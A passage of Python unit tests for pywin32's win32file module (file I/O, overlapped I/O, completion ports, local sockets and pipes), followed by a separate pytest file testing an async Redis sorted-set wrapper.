win32file.WriteFile(h, data)
self.failUnless(win32file.GetFileSize(h) == len(data), "WARNING: Written file does not have the same size as the length of the data in it!")
# Ensure we can read the data back.
win32file.SetFilePointer(h, 0, win32file.FILE_BEGIN)
hr, read_data = win32file.ReadFile(h, len(data)+10) # + 10 to get anything extra
self.failUnless(hr==0, "Readfile returned %d" % hr)
self.failUnless(read_data == data, "Read data is not what we wrote!")
# Now truncate the file at 1/2 its existing size.
newSize = len(data)//2
win32file.SetFilePointer(h, newSize, win32file.FILE_BEGIN)
win32file.SetEndOfFile(h)
self.failUnlessEqual(win32file.GetFileSize(h), newSize)
# GetFileAttributesEx/GetFileAttributesExW tests.
self.failUnlessEqual(win32file.GetFileAttributesEx(testName), win32file.GetFileAttributesExW(testName))
attr, ct, at, wt, size = win32file.GetFileAttributesEx(testName)
self.failUnless(size==newSize,
"Expected GetFileAttributesEx to return the same size as GetFileSize()")
self.failUnless(attr==win32file.GetFileAttributes(testName),
"Expected GetFileAttributesEx to return the same attributes as GetFileAttributes")
h = None # Close the file by removing the last reference to the handle!
self.failUnless(not os.path.isfile(testName), "After closing the file, it still exists!")
def testFilePointer(self):
# via [ 979270 ] SetFilePointer fails with negative offset
# Create a file in the %TEMP% directory.
filename = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
f = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0,
None,
win32file.CREATE_ALWAYS,
win32file.FILE_ATTRIBUTE_NORMAL,
0)
try:
#Write some data
data = str2bytes('Some data')
(res, written) = win32file.WriteFile(f, data)
self.failIf(res)
self.assertEqual(written, len(data))
#Move at the beginning and read the data
win32file.SetFilePointer(f, 0, win32file.FILE_BEGIN)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.assertEqual(s, data)
#Move at the end and read the data
win32file.SetFilePointer(f, -len(data), win32file.FILE_END)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.failUnlessEqual(s, data)
finally:
f.Close()
os.unlink(filename)
def testFileTimesTimezones(self):
if not issubclass(pywintypes.TimeType, datetime.datetime):
# maybe should report 'skipped', but that's not quite right as
# there is nothing you can do to avoid it being skipped!
return
filename = tempfile.mktemp("-testFileTimes")
now_utc = win32timezone.utcnow()
now_local = now_utc.astimezone(win32timezone.TimeZoneInfo.local())
h = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None, win32file.CREATE_ALWAYS, 0, 0)
try:
win32file.SetFileTime(h, now_utc, now_utc, now_utc)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_local, ct)
self.failUnlessEqual(now_local, at)
self.failUnlessEqual(now_local, wt)
# and the reverse - set local, check against utc
win32file.SetFileTime(h, now_local, now_local, now_local)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_utc, ct)
self.failUnlessEqual(now_utc, at)
self.failUnlessEqual(now_utc, wt)
finally:
h.close()
os.unlink(filename)
def testFileTimes(self):
if issubclass(pywintypes.TimeType, datetime.datetime):
from win32timezone import TimeZoneInfo
now = datetime.datetime.now(tz=TimeZoneInfo.local())
nowish = now + datetime.timedelta(seconds=1)
later = now + datetime.timedelta(seconds=120)
else:
rc, tzi = win32api.GetTimeZoneInformation()
bias = tzi[0]
if rc==2: # daylight-savings is in effect.
bias += tzi[-1]
bias *= 60 # minutes to seconds...
tick = int(time.time())
now = pywintypes.Time(tick+bias)
nowish = pywintypes.Time(tick+bias+1)
later = pywintypes.Time(tick+bias+120)
filename = tempfile.mktemp("-testFileTimes")
# Windows docs the 'last time' isn't valid until the last write
# handle is closed - so create the file, then re-open it to check.
open(filename,"w").close()
f = win32file.CreateFile(filename, win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None,
win32con.OPEN_EXISTING, 0, None)
try:
ct, at, wt = win32file.GetFileTime(f)
self.failUnless(ct >= now, "File was created in the past - now=%s, created=%s" % (now, ct))
self.failUnless( now <= ct <= nowish, (now, ct))
self.failUnless(wt >= now, "File was written-to in the past now=%s, written=%s" % (now,wt))
self.failUnless( now <= wt <= nowish, (now, wt))
# Now set the times.
win32file.SetFileTime(f, later, later, later)
# Get them back.
ct, at, wt = win32file.GetFileTime(f)
# XXX - the builtin PyTime type appears to be out by a dst offset.
# just ignore that type here...
if issubclass(pywintypes.TimeType, datetime.datetime):
self.failUnlessEqual(ct, later)
self.failUnlessEqual(at, later)
self.failUnlessEqual(wt, later)
finally:
f.Close()
os.unlink(filename)
class TestOverlapped(unittest.TestCase):
def testSimpleOverlapped(self):
# Create a file in the %TEMP% directory.
import win32event
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_WRITE
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
# Create the file and write shit-loads of data to it.
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.CREATE_ALWAYS, 0, 0)
chunk_data = str2bytes("z") * 0x8000
num_loops = 512
expected_size = num_loops * len(chunk_data)
for i in range(num_loops):
win32file.WriteFile(h, chunk_data, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(chunk_data)
h.Close()
# Now read the data back overlapped
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
desiredAccess = win32file.GENERIC_READ
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.OPEN_EXISTING, 0, 0)
buffer = win32file.AllocateReadBuffer(0xFFFF)
while 1:
try:
hr, data = win32file.ReadFile(h, buffer, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(data)
if not data is buffer:
self.fail("Unexpected result from ReadFile - should be the same buffer we passed it")
except win32api.error:
break
h.Close()
def testCompletionPortsMultiple(self):
# Mainly checking that we can "associate" an existing handle. This
# failed in build 203.
ioport = win32file.CreateIoCompletionPort(win32file.INVALID_HANDLE_VALUE,
0, 0, 0)
socks = []
for PORT in range(9123, 9125):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', PORT))
sock.listen(1)
socks.append(sock)
new = win32file.CreateIoCompletionPort(sock.fileno(), ioport, PORT, 0)
assert new is ioport
for s in socks:
s.close()
hv = int(ioport)
ioport = new = None
# The handle itself should be closed now (unless we leak references!)
# Check that.
try:
win32file.CloseHandle(hv)
raise RuntimeError("Expected close to fail!")
except win32file.error, details:
self.failUnlessEqual(details.winerror, winerror.ERROR_INVALID_HANDLE)
def testCompletionPortsQueued(self):
class Foo: pass
io_req_port = win32file.CreateIoCompletionPort(-1, None, 0, 0)
overlapped = pywintypes.OVERLAPPED()
overlapped.object = Foo()
win32file.PostQueuedCompletionStatus(io_req_port, 0, 99, overlapped)
errCode, bytes, key, overlapped = \
win32file.GetQueuedCompletionStatus(io_req_port, win32event.INFINITE)
self.failUnlessEqual(errCode, 0)
self.failUnless(isinstance(overlapped.object, Foo))
def _IOCPServerThread(self, handle, port, drop_overlapped_reference):
overlapped = pywintypes.OVERLAPPED()
win32pipe.ConnectNamedPipe(handle, overlapped)
if drop_overlapped_reference:
# Be naughty - the overlapped object is now dead, but
# GetQueuedCompletionStatus will still find it. Our check of
# reference counting should catch that error.
overlapped = None
# even if we fail, be sure to close the handle; prevents hangs
# on Vista 64...
try:
self.failUnlessRaises(RuntimeError,
win32file.GetQueuedCompletionStatus, port, -1)
finally:
handle.Close()
return
result = win32file.GetQueuedCompletionStatus(port, -1)
ol2 = result[-1]
self.failUnless(ol2 is overlapped)
data = win32file.ReadFile(handle, 512)[1]
win32file.WriteFile(handle, data)
def testCompletionPortsNonQueued(self, test_overlapped_death = 0):
# In 204 we had a reference count bug when OVERLAPPED objects were
# associated with a completion port other than via
# PostQueuedCompletionStatus. This test is based on the reproduction
# reported with that bug.
# Create the pipe.
BUFSIZE = 512
pipe_name = r"\\.\pipe\pywin32_test_pipe"
handle = win32pipe.CreateNamedPipe(pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX|
win32file.FILE_FLAG_OVERLAPPED,
win32pipe.PIPE_TYPE_MESSAGE|
win32pipe.PIPE_READMODE_MESSAGE|
win32pipe.PIPE_WAIT,
1, BUFSIZE, BUFSIZE,
win32pipe.NMPWAIT_WAIT_FOREVER,
None)
# Create an IOCP and associate it with the handle.
port = win32file.CreateIoCompletionPort(-1, 0, 0, 0)
win32file.CreateIoCompletionPort(handle, port, 1, 0)
t = threading.Thread(target=self._IOCPServerThread, args=(handle,port, test_overlapped_death))
t.setDaemon(True) # avoid hanging entire test suite on failure.
t.start()
try:
time.sleep(0.1) # let thread do its thing.
try:
win32pipe.CallNamedPipe(r"\\.\pipe\pywin32_test_pipe", str2bytes("Hello there"), BUFSIZE, 0)
except win32pipe.error:
# Testing for overlapped death causes this
if not test_overlapped_death:
raise
finally:
if not test_overlapped_death:
handle.Close()
t.join(3)
self.failIf(t.isAlive(), "thread didn't finish")
def testCompletionPortsNonQueuedBadReference(self):
self.testCompletionPortsNonQueued(True)
def testHashable(self):
overlapped = pywintypes.OVERLAPPED()
d = {}
d[overlapped] = "hello"
self.failUnlessEqual(d[overlapped], "hello")
def testComparable(self):
overlapped = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped, overlapped)
# ensure we explicitly test the operators.
self.failUnless(overlapped == overlapped)
self.failIf(overlapped != overlapped)
def testComparable2(self):
# 2 overlapped objects compare equal if their contents are the same.
overlapped1 = pywintypes.OVERLAPPED()
overlapped2 = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failUnless(overlapped1 == overlapped2)
self.failIf(overlapped1 != overlapped2)
# now change something in one of them - should no longer be equal.
overlapped1.hEvent = 1
self.failIfEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failIf(overlapped1 == overlapped2)
self.failUnless(overlapped1 != overlapped2)
class TestSocketExtensions(unittest.TestCase):
def acceptWorker(self, port, running_event, stopped_event):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(('', port))
listener.listen(200)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
# We used to allow strings etc to be passed here, and they would be
# modified! Obviously this is evil :)
buffer = " " * 1024 # EVIL - SHOULD NOT BE ALLOWED.
self.assertRaises(TypeError, win32file.AcceptEx, listener, accepter, buffer, overlapped)
# This is the correct way to allocate the buffer...
buffer = win32file.AllocateReadBuffer(1024)
rc = win32file.AcceptEx(listener, accepter, buffer, overlapped)
self.failUnlessEqual(rc, winerror.ERROR_IO_PENDING)
# Set the event to say we are all ready
running_event.set()
# and wait for the connection.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
#fam, loc, rem = win32file.GetAcceptExSockaddrs(accepter, buffer)
accepter.send(buffer[:nbytes])
# NOT set in a finally - this means *successfully* stopped!
stopped_event.set()
def testAcceptEx(self):
port = 4680
running = threading.Event()
stopped = threading.Event()
t = threading.Thread(target=self.acceptWorker, args=(port, running,stopped))
t.start()
running.wait(2)
if not running.isSet():
self.fail("AcceptEx Worker thread failed to start")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
win32file.WSASend(s, str2bytes("hello"), None)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# Like above - WSARecv used to allow strings as the receive buffer!!
buffer = " " * 10
self.assertRaises(TypeError, win32file.WSARecv, s, buffer, overlapped)
# This one should work :)
buffer = win32file.AllocateReadBuffer(10)
win32file.WSARecv(s, buffer, overlapped)
nbytes = win32file.GetOverlappedResult(s.fileno(), overlapped, True)
got = buffer[:nbytes]
self.failUnlessEqual(got, str2bytes("hello"))
# thread should have stopped
stopped.wait(2)
if not stopped.isSet():
self.fail("AcceptEx Worker thread failed to successfully stop")
class TestFindFiles(unittest.TestCase):
def testIter(self):
dir = os.path.join(os.getcwd(), "*")
files = win32file.FindFilesW(dir)
set1 = set()
set1.update(files)
set2 = set()
for file in win32file.FindFilesIterator(dir):
set2.add(file)
assert len(set2) > 5, "This directory has less than 5 files!?"
self.failUnlessEqual(set1, set2)
def testBadDir(self):
dir = os.path.join(os.getcwd(), "a dir that doesnt exist", "*")
self.assertRaises(win32file.error, win32file.FindFilesIterator, dir)
def testEmptySpec(self):
spec = os.path.join(os.getcwd(), "*.foo_bar")
num = 0
for i in win32file.FindFilesIterator(spec):
num += 1
self.failUnlessEqual(0, num)
def testEmptyDir(self):
test_path = os.path.join(win32api.GetTempPath(), "win32file_test_directory")
try:
# Note: previously used shutil.rmtree, but when looking for
# reference count leaks, that function showed leaks! os.rmdir
# doesn't have that problem.
os.rmdir(test_path)
except os.error:
pass
os.mkdir(test_path)
try:
num = 0
for i in win32file.FindFilesIterator(os.path.join(test_path, "*")):
num += 1
# Expecting "." and ".." only
self.failUnlessEqual(2, num)
finally:
os.rmdir(test_path)
class TestDirectoryChanges(unittest.TestCase):
num_test_dirs = 1
def setUp(self):
self.watcher_threads = []
self.watcher_thread_changes = []
self.dir_names = []
self.dir_handles = []
for i in range(self.num_test_dirs):
td = tempfile.mktemp("-test-directory-changes-%d" % i)
os.mkdir(td)
self.dir_names.append(td)
hdir = win32file.CreateFile(td,
ntsecuritycon.FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ,
None, # security desc
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS |
win32con.FILE_FLAG_OVERLAPPED,
None)
self.dir_handles.append(hdir)
changes = []
t = threading.Thread(target=self._watcherThreadOverlapped,
args=(td, hdir, changes))
t.start()
self.watcher_threads.append(t)
self.watcher_thread_changes.append(changes)
def _watcherThread(self, dn, dh, changes):
# A synchronous version:
# XXX - not used - I was having a whole lot of problems trying to
# get this to work. Specifically:
# * ReadDirectoryChangesW without an OVERLAPPED blocks infinitely.
# * If another thread attempts to close the handle while
# ReadDirectoryChangesW is waiting on it, the ::CloseHandle() method
# blocks (which has nothing to do with the GIL - it is correctly
# managed)
# Which ends up with no way to kill the thread!
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
while 1:
try:
print "waiting", dh
changes = win32file.ReadDirectoryChangesW(dh,
8192,
False, #sub-tree
flags)
print "got", changes
except:
raise
changes.extend(changes)
def _watcherThreadOverlapped(self, dn, dh, changes):
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
buf = win32file.AllocateReadBuffer(8192)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
while 1:
win32file.ReadDirectoryChangesW(dh,
buf,
False, #sub-tree
flags,
overlapped)
# Wait for our event, or for 5 seconds.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 5000)
if rc == win32event.WAIT_OBJECT_0:
# got some data! Must use GetOverlappedResult to find out
# how much is valid! 0 generally means the handle has
# been closed. Blocking is OK here, as the event has
# already been set.
nbytes = win32file.GetOverlappedResult(dh, overlapped, True)
if nbytes:
bits = win32file.FILE_NOTIFY_INFORMATION(buf, nbytes)
changes.extend(bits)
else:
# This is "normal" exit - our 'tearDown' closes the
# handle.
# print "looks like dir handle was closed!"
return
else:
print "ERROR: Watcher thread timed-out!"
return # kill the thread!
def tearDown(self):
# be careful about raising errors at teardown!
for h in self.dir_handles:
# See comments in _watcherThread above - this appears to
# deadlock if a synchronous ReadDirectoryChangesW is waiting...
# (No such problems with an asynch ReadDirectoryChangesW)
h.Close()
for dn in self.dir_names:
try:
shutil.rmtree(dn)
except OSError:
print "FAILED to remove directory", dn
for t in self.watcher_threads:
# closing dir handle should have killed threads!
t.join(5)
if t.isAlive():
print "FAILED to wait for thread termination"
def stablize(self):
time.sleep(0.5)
def testSimple(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "test_file")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "test_file")])
def testSmall(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "x")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "x")])
class TestEncrypt(unittest.TestCase):
def testEncrypt(self):
fname = tempfile.mktemp("win32file_test")
f = open(fname, "wb")
f.write(str2bytes("hello"))
f.close()
f = None
try:
try:
win32file.EncryptFile(fname)
except win32file.error, details:
if details.winerror != winerror.ERROR_ACCESS_DENIED:
raise
print "It appears this is not NTFS - cant encrypt/decrypt"
win32file.DecryptFile(fname)
finally:
if f is not None:
f.close()
os.unlink(fname)
class TestConnect(unittest.TestCase):
def connect_thread_runner(self, expect_payload, giveup_event):
# As Windows 2000 doesn't do ConnectEx, we need to use a non-blocking
# accept, as our test connection may never come. May as well use
# AcceptEx for this...
listener = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
listener.bind(self.addr)
listener.listen(1)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
if expect_payload:
buf_size = 1024
else:
# when we don't expect data we must be careful to only pass the
# exact number of bytes for the endpoint data...
buf_size = win32file.CalculateSocketEndPointSize(listener)
buffer = win32file.AllocateReadBuffer(buf_size)
win32file.AcceptEx(listener, accepter, buffer, overlapped)
# wait for the connection or our test to fail.
events = giveup_event, overlapped.hEvent
rc = win32event.WaitForMultipleObjects(events, False, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
if rc == win32event.WAIT_OBJECT_0:
# Our main thread running the test failed and will never connect.
return
# must be a connection.
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
if expect_payload:
self.request = buffer[:nbytes]
accepter.send(str2bytes('some expected response'))
def test_connect_with_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(True, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol, str2bytes("some expected request"))
except win32file.error, exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
self.assertEqual(self.request, str2bytes('some expected request'))
t.join(5)
self.failIf(t.isAlive(), "worker thread didn't terminate")
def test_connect_without_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(False, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol)
except win32file.error, exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
t.join(5)
self.failIf(t.isAlive(), "worker thread didn't terminate")
class TestTransmit(unittest.TestCase):
def test_transmit(self):
import binascii
try:
bytes = os.urandom(1024*1024)
except AttributeError:
# must be py2.3...
bytes = ''.join([chr(random.randint(0,255)) for _ in range(5)])
val = binascii.hexlify(bytes)
val_length = len(val)
f = tempfile.TemporaryFile()
f.write(val)
def runner():
s1 = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
s1.bind(self.addr)
s1.listen(1)
cli, addr = s1.accept()
buf = 1
self.request = []
while buf:
buf = cli.recv(1024*100)
self.request.append(buf)
th = threading.Thread(target=runner)
th.start()
time.sleep(0.5)
s2 = socket.socket()
s2.connect(self.addr)
length = 0
aaa = str2bytes("[AAA]")
bbb = str2bytes("[BBB]")
ccc = str2bytes("[CCC]")
ddd = str2bytes("[DDD]")
empty = str2bytes("")
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, aaa, bbb)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, empty, empty)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, None, ccc)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, ddd)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
s2.close()
th.join()
buf = str2bytes('').join(self.request)
self.assertEqual(length, len(buf))
expected = val + aaa + val + bbb + val + val + ccc + ddd + val
self.assertEqual(type(expected), type(buf))
self.assert_(expected == buf)
class TestWSAEnumNetworkEvents(unittest.TestCase):
def test_basics(self):
s = socket.socket()
e = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(s, e, 0)
self.assertEquals(win32file.WSAEnumNetworkEvents(s), {})
self.assertEquals(win32file.WSAEnumNetworkEvents(s, e), {})
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, e, 3)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, "spam")
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam", e)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam")
f = open("NUL")
h = win32file._get_osfhandle(f.fileno())
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, h)
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, s, h)
try:
win32file.WSAEnumNetworkEvents(h)
except win32file.error, e:
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
try:
win32file.WSAEnumNetworkEvents(s, h)
except win32file.error, e:
# According to the docs it would seem reasonable that
# this would fail with WSAEINVAL, but it doesn't.
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
def test_functional(self):
# This is not really a unit test, but it does exercise the code
# quite well and can serve as an example of WSAEventSelect and
# WSAEnumNetworkEvents usage.
port = socket.socket()
port.setblocking(0)
port_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(port, port_event,
win32file.FD_ACCEPT |
win32file.FD_CLOSE)
port.bind(("127.0.0.1", 0))
port.listen(10)
client = socket.socket()
client.setblocking(0)
client_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(client, client_event,
win32file.FD_CONNECT |
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
err = client.connect_ex(port.getsockname())
self.assertEquals(err, win32file.WSAEWOULDBLOCK)
res = win32event.WaitForSingleObject(port_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(port, port_event)
self.assertEquals(events, {win32file.FD_ACCEPT: 0})
server, addr = port.accept()
server.setblocking(0)
server_event = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(server, server_event,
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CONNECT: 0,
win32file.FD_WRITE: 0})
sent = 0
data = str2bytes("x") * 16 * 1024
while sent < 16 * 1024 * 1024:
try:
sent += client.send(data)
except socket.error, e:
if e.args[0] == win32file.WSAEINTR:
continue
elif e.args[0] in (win32file.WSAEWOULDBLOCK, win32file.WSAENOBUFS):
break
else:
raise
else:
self.fail("could not find socket buffer limit")
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_READ: 0})
received = 0
while received < sent:
try:
received += len(server.recv(16 * 1024))
except socket.error, e:
if e.args[0] in [win32file.WSAEINTR, win32file.WSAEWOULDBLOCK]:
continue
else:
raise
self.assertEquals(received, sent)
events = win32file.WSAEnumNetworkEvents(server)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
client.shutdown(socket.SHUT_WR)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
# strange timing issues...
for i in range(5):
events = win32file.WSAEnumNetworkEvents(server, server_event)
if events: break
win32api.Sleep(100)
else:
raise AssertionError("failed to get events")
self.assertEquals(events, {win32file.FD_CLOSE: 0})
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
server.close()
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CLOSE: 0})
client.close()
events = win32file.WSAEnumNetworkEvents(port)
self.assertEquals(events, {})
if __name__ == '__main__':
testmain()
|
test_sortedset.py
|
from purse.collections import RedisSortedSet
from pydantic import BaseModel
import pytest
import aioredis
import asyncio
from threading import Thread
class Context:
def __init__(self):
self.rc = aioredis.Redis(db=5)
self.loop = asyncio.new_event_loop()
def _loop_thread_target():
self.loop.run_forever()
self.loop.close()
self._loop_thread = Thread(target=_loop_thread_target, daemon=True)
self._loop_thread.start()
def run(self, coro) -> asyncio.Future:
return asyncio.run_coroutine_threadsafe(coro, self.loop)
@pytest.fixture(scope="session")
def ctx() -> Context:
ctx = Context()
yield ctx
def test_basics(ctx):
plants = {
'lettuce': 3,
'carrots': 4,
'apples': 5,
'bananas': 7,
'tomatoes': 8,
'spinach': 9,
'broccoli': 12,
}
key = 'trash:basic'
rss = RedisSortedSet(ctx.rc, key, str)
async def main():
await rss.clear()
assert await rss.len() == 0
await rss.add([(k, v) for k, v in plants.items()])
assert await rss.len() == 7
async for k, v in rss.values():
assert k in plants and plants[k] == v
k, v = (await rss.pop_max())[0]
assert k == 'broccoli' and v == 12
k, v = (await rss.pop_min())[0]
assert k == 'lettuce' and v == 3
assert await rss.len() == 5
await rss.clear()
return 0
num = ctx.run(main()).result()
assert num == 0
def test_non_uniques(ctx):
plants = {
'lettuce': 3,
'carrots': 4,
'apples': 5,
'bananas': 7,
'tomatoes': 8,
'bananas': 10,
'spinach': 9,
'broccoli': 12,
}
key = 'trash:basic'
rss = RedisSortedSet(ctx.rc, key, str)
async def main():
await rss.clear()
assert await rss.len() == 0
await rss.add([(k, v) for k, v in plants.items()])
assert await rss.len() == 7
async for k, v in rss.values():
assert k in plants and plants[k] == v
k, v = (await rss.pop_max())[0]
assert k == 'broccoli' and v == 12
k, v = (await rss.pop_min())[0]
assert k == 'lettuce' and v == 3
assert await rss.len() == 5
await rss.clear()
return 0
num = ctx.run(main()).result()
assert num == 0
def test_models(ctx):
class Plant(BaseModel):
name: str
nutrition: float
tasty: bool = False
plants = [
Plant(name="apples", nutrition=5, tasty=True),
Plant(name="bananas", nutrition=3, tasty=True),
Plant(name="spinach", nutrition=9, tasty=False),
Plant(name="tomatoes", nutrition=8, tasty=False),
Plant(name="carrots", nutrition=7, tasty=False),
Plant(name="broccoli", nutrition=12, tasty=True),
Plant(name="lettuce", nutrition=4, tasty=False),
Plant(name="mangoes", nutrition=6, tasty=True)
]
key = "trash:models"
rss = RedisSortedSet(ctx.rc, key, Plant)
async def main():
await rss.clear()
assert await rss.len() == 0
await rss.add([(p, p.nutrition) for p in plants])
assert await rss.len() == len(plants)
p: Plant
p, s = (await rss.pop_max())[0]
assert p.name == "broccoli" and s == p.nutrition
assert await rss.len() == len(plants) - 1
mins = await rss.pop_min(count=2)
p, s = mins[0]
assert p.name == "bananas" and s == p.nutrition
p, s = mins[1]
assert p.name == "lettuce" and s == p.nutrition
assert await rss.len() == len(plants) - 3
